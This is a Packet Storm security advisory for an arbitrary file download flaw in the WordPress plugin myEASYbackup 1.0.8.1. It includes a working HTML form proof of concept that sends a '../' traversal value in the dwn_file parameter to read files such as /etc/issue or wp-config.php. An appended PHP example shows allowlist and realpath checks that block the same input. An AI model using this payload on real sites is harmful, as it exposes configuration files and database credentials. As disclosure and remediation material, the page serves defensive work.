packetstorm | Antiphastrophus | PACKETSTORM:108711
Jan 16, 2012 - 12:00 a.m.

WordPress myEASYbackup 1.0.8.1 Directory Traversal

packetstormsecurity.com
`WordPress plugin myEASYbackup 1.0.8.1 arbitrary file download  
http://wordpress.org/extend/plugins/myeasybackup/  
  
Parameter: "dwn_file" (POST)  
Script: "meb_download.php"  
You can get wp-config.php or whatever (using advanced directory traversal  
technology)!  
  
  
<form method="post" action="http://CENSORED/wp-content/plugins/myeasybackup/meb_download.php">  
<input type="text" name="dwn_file" value="../../../../../../../../etc/issue">  
<input type="submit">  
</form>  
  
  
  
author: antiphastrophus  
`
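
One way a download handler can refuse the `dwn_file` traversal shown above, as an added example (not the plugin's code, which this page does not show). The function name `resolve_backup_file()`, the temporary directory standing in for the backup folder, and the extension allowlist are assumptions for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper: map a user-supplied backup file name to a path
 * inside $baseDir, or return null when the request must be refused.
 */
function resolve_backup_file(string $baseDir, string $requested): ?string
{
    // Allowlist: a bare file name with an archive extension (assumed list).
    // No "/" or "\" can pass, so "../" sequences are rejected up front.
    if (!preg_match('/\A[A-Za-z0-9._-]+\.(zip|tar|gz|sql)\z/', $requested)) {
        return null;
    }
    // realpath() canonicalises "..", follows symlinks and returns false
    // when the target does not exist.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false || !is_file($full)) {
        return null;
    }
    // Containment check on the canonical path: it must sit under the base
    // directory even if a symlink inside that directory points elsewhere.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Constructed demo data: a temp directory with one sample archive.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'meb_demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'site-backup.zip', 'constructed sample');

$cases = [
    'site-backup.zip',                    // legitimate backup name
    '../../../../../../../../etc/issue',  // value from the form on this page
    '..\\wp-config.php',                  // backslash variant
    'wp-config.php',                      // bare name, wrong file type
];
foreach ($cases as $name) {
    $path = resolve_backup_file($dir, $name);
    printf("%-40s => %s\n", $name, $path === null ? 'refused' : 'served');
}

unlink($dir . DIRECTORY_SEPARATOR . 'site-backup.zip');
rmdir($dir);
```

The allowlist and the canonical-path comparison are independent checks, so a gap in one (for example a symlink placed in the backup folder) is still caught by the other.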